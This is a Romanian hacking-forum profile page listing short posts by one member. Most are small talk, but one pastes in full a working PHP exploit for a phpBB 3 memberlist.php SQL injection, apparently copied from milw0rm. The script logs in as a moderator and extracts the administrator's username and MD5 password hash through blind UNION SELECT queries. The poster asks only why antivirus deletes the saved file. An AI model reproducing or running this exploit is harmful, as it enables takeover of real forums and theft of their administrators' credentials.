Jump to content

shakur20

Members
 View Profile  See their activity

  • Posts

    9

  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

shakur20's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. shakur20
    cool!!! nod32 sucks:| thx close and delete please.
  2. shakur20
    pai atunci cand vreau sa il salvezi ca exploit.pl in c:\perl ,imi dispare dupa 1ms fisierul exploit.pl,pur si simplu nu apare in folder!!!
  3. shakur20
    salut.Am si eu o mica problema.Am luat un exploit de pe millw0rm care are codul cam asa: #!/usr/bin/php -q -d short_open_tag=on <? echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n"; echo "by rgod rgod@autistici.org\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n"; /* works regardless of php.ini settings you need a global moderator account with "simple moderator" role */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo "path: path to phpbb3\n"; echo "user/pass: u need a valid user account with global moderator rights\n"; echo "Options:\n"; echo " -T[prefix] specify a table prefix different from default (phpbb_)\n"; echo " -p[port]: specify a port other than 80\n"; echo " -P[ip:port]: specify a proxy\n"; echo " -u[number]: specify a user id other than 2 (admin)\n"; echo " -x: disclose table prefix through error messages\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=$argv[4]; $port=80; $prefix="PHPBB_"; $user_id="2";//admin $discl=0; $proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } if ($temp=="-u") { $user_id=str_replace("-u","",$argv[$i]); } if ($temp=="-x") { $discl=1; } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data="username=".urlencode($user); $data.="&password=".urlencode($pass); $data.="&redirect=index.php"; $data.="&login=Login"; $packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n"; $packet.="Referer: http://$host$path/ucp.php?mode=login\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i<=count($temp)-1; $i++) { $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0]; } if (eregi("_u=1;",$cookie)) { //echo $html."\n";//debug //die("Unable to login..."); } echo "cookie -> ".$cookie."\r\n"; if ($discl) { $sql="'suntzuuuuu"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"You have an error in your SQL syntax")) { $temp=explode("posts",$html); $temp2=explode(" ",$temp[0]); $prefix=strtoupper($temp2[count($temp2)-1]); echo "prefix -> ".$prefix."\n";sleep(2); } } $md5s[0]=0;//null $md5s=array_merge($md5s,range(48,57)); //numbers $md5s=array_merge($md5s,range(97,102));//a-f letters //print_r(array_values($md5s)); $j=1;$password=""; while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$md5s)) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");} } $j++; } $j=1;$admin=""; while (!strstr($admin,chr(0))) { for ($i=0; $i<=255; $i++) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");} $j++; } echo "--------------------------------------------------------------------\r\n"; echo "admin -> ".$admin."\r\n"; echo "password (md5) -> ".$password."\r\n"; echo "--------------------------------------------------------------------\r\n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?> problema e ca nu pot sa il salvez ca nume_exploit.pl pentru ca pur si simplu dispare la 1 ms dupa salvare.Ce pot sa fac?
  4. shakur20

    VB or C++

    shakur20 replied to Gonzalez's topic in Off-topic

    parerea mea...c++,cbuilder si apoi vb
  5. shakur20
    http://babelfish.altavista.com/ copy paste dintr-i fereastra in alta rotfl
  6. shakur20

    bau!

    shakur20 posted a topic in Bine ai venit

    de trei zile navighez pe forumu` asta si am uitat sa salut:( re ol sunt varzik asha..dar am unele baze puse in anumite chestii..i hope i`ll enjoy it see ya around
  7. shakur20
    1.puneti si voi un server,2 pe care jucatzi..sa vada lumea cum va miscatzi(valabilt pentru fiecare) 2.ce conditii tre sa indeplinesti sa intri in clan? 3.vreau si eu 4.parerea mea
  8. shakur20
    super post-nu e doar o lectie pentru a deveni un adevarat informatician..e o lectie de viata..go go go!
×
×
  • Create New...